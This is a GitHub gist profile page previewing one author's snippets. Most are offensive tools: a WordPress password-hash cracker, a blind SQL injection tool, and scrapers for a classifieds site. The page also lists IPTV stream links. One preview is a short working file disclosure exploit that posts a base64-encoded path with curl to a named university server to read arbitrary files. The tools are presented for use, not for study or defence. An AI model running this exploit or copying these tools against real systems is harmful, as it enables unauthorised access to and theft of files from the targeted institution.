Skip to content

Instantly share code, notes, and snippets.

View carlosernestolopez's full-sized avatar

Carlos E. López carlosernestolopez

View GitHub Profile
@carlosernestolopez
carlosernestolopez / WpHashCrack.cs
Last active January 20, 2020 17:46
Wordpress Hash PHPass Cracker using Word Lists... | Por Carlos E. Lopez :: @leon, Nicaragua
using System;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
namespace WpHashCrack
{
class Program
[Nombre Canal]
HQ Link
Mobile Link
Canal 2
http://138.117.4.70:8079/streams/d/CH-2/playlist.m3u8
http://138.117.4.70:8079/streams/d/Canal-2M/playlist.m3u8
Canal 4
http://138.117.4.70:8079/streams/d/CH-4/playlist.m3u8
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Net;
using System.Text;
using System.Threading.Tasks;
using System.Web;
namespace todoBusco
@carlosernestolopez
carlosernestolopez / getInfo_sitemap.php
Created October 8, 2019 06:39
getInfo todobusco.com using sitemap
<?php
# getInfo todobusco.com using sitemap
# it didn't work btw
# celopez.ni1990@gmail.com
$info = simplexml_load_string(file_get_contents('https://todobusco.com/sitemap.xml'));
foreach($info as $inf) {
$res = @file_get_contents( $inf->loc );
@carlosernestolopez
carlosernestolopez / getInfo_search.php
Created October 8, 2019 06:38
getInfo todobusco.com using search
<?php
# getInfo todobusco.com using search
# celopez.ni1990@gmail.com
$countries = array('costa-rica', 'nicaragua', 'dominicana');
foreach($countries as $country) {
# CASAS
#$url = 'https://todobusco.com/casa/'.$country.'/buscar/alquiler-venta-de-inmuebles-en-'.$country;
<?php
# Proafac File Disclosure Exploit
# By Carlos E. López
# celopez.ni1990@gmail.com
$dir = base64_encode($argv[1]);
$cmd = 'curl --insecure https://proafac.unanleon.edu.ni/actas/indice.php --data "path='.$dir.'"';
$info = shell_exec($cmd);
@carlosernestolopez
carlosernestolopez / BraileCMD.cs
Last active September 27, 2019 18:22
// Braile // MySQL Blind SQL Injections Tool
// Braile
// MySQL Blind SQL Injections Tool
// By Carlos E. López
// celopez.ni1990@gmail.com
// León, Nicaragua
// 13/09/2019 Se agregó soporte para peticiones POST
// 13/09/2019 Mejoras varias
using System;